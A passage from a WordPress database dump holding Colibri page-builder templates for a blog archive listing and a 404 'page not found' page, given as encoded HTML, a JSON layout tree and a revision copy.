20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2234-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2234-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]</div>\n </div>\n</div>','main_archive','','publish','closed','closed','','34','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&p=34',0,'extb_post_main','',0),(35,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"34-m27\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":107,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"34-m28\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":108,\"type\":\"main\"}],\"id\":\"34-m26\",\"parentId\":\"34-m25\",\"partialId\":34,\"styleRef\":106,\"type\":\"main\"}],\"id\":\"34-m25\",\"parentId\":\"34-m2\",\"partialId\":34,\"styleRef\":105,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"slot\":null,\"parentId\":\"34-m4\",\"index\":0,\"id\":\"34-m5\",\"partialId\":34,\"styleRef\":111,\"type\":\"main\",\"props\":{\"showPlaceholder\":false}},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"100\"}}}}},\"id\":\"34-m7\",\"parentId\":\"34-m6\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"separator\":\"| \",\"showIcons\":false,\"dateFormat\":\"M j\"},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m8\",\"partialId\":34,\"styleRef\":114,\"type\":\"main\"},{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":false},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m9\",\"partialId\":34,\"styleRef\":115,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"id\":\"34-m10\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":116,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-excerpt\",\"id\":\"34-m11\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":117,\"type\":\"main\",\"props\":{\"maxLength\":\"16\"}}],\"styleRef\":113,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m6\",\"partialId\":34,\"styleRef\":112,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m13\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":true,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":true,\"separator\":\"\"},\"slot\":null,\"parentId\":\"34-m13\",\"index\":0,\"id\":\"34-m14\",\"partialId\":34,\"styleRef\":120,\"type\":\"main\"}],\"styleRef\":119,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m15\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"34-m17\",\"parentId\":\"34-m16\",\"partialId\":34,\"styleRef\":123,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m15\",\"index\":0,\"id\":\"34-m16\",\"partialId\":34,\"styleRef\":122,\"type\":\"main\"}],\"styleRef\":121,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m12\",\"partialId\":34,\"styleRef\":118,\"type\":\"main\"}],\"id\":\"34-m4\",\"parentId\":\"34-m3\",\"partialId\":34,\"styleRef\":110,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"34-m2\",\"index\":0,\"id\":\"34-m3\",\"partialId\":34,\"styleRef\":109,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m19\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m19\",\"index\":0,\"id\":\"34-m20\",\"partialId\":34,\"styleRef\":126,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"prevLabel\":\"Previous\",\"stateType\":\"hover\"}}],\"styleRef\":125,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m21\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"34-m21\",\"index\":0,\"id\":\"34-m22\",\"partialId\":34,\"styleRef\":128,\"type\":\"main\",\"props\":{\"stateType\":\"\"}}],\"styleRef\":127,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m23\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m23\",\"index\":0,\"id\":\"34-m24\",\"partialId\":34,\"styleRef\":130,\"type\":\"main\",\"props\":{\"stateType\":\"hover\"}}],\"styleRef\":129,\"type\":\"main\"}],\"parentId\":\"34-m2\",\"index\":1,\"id\":\"34-m18\",\"partialId\":34,\"styleRef\":124,\"type\":\"main\"}],\"parentId\":\"34-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Posts\",\"attrs\":{\"id\":\"blog-posts\"}},\"id\":\"34-m2\",\"partialId\":34,\"styleRef\":104}],\"id\":\"34-m1\",\"partialId\":34,\"styleRef\":103,\"type\":\"main\"}','','','publish','closed','closed','','35','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=35',0,'extb_post_json','',0),(36,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22435-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%22435-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22435-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22435-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]</div>\n </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',34,'https://gsudice.dataconn.net/?p=36',0,'revision','',0),(37,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-134 style-local-37-m4\">\n <!---->\n <!---->\n <h2 class=\"\">404</h2>\n </div>\n </div>\n <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Sorry, page not found!</p>\n </div>\n </div>\n <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\" data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span> <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n </span>\n 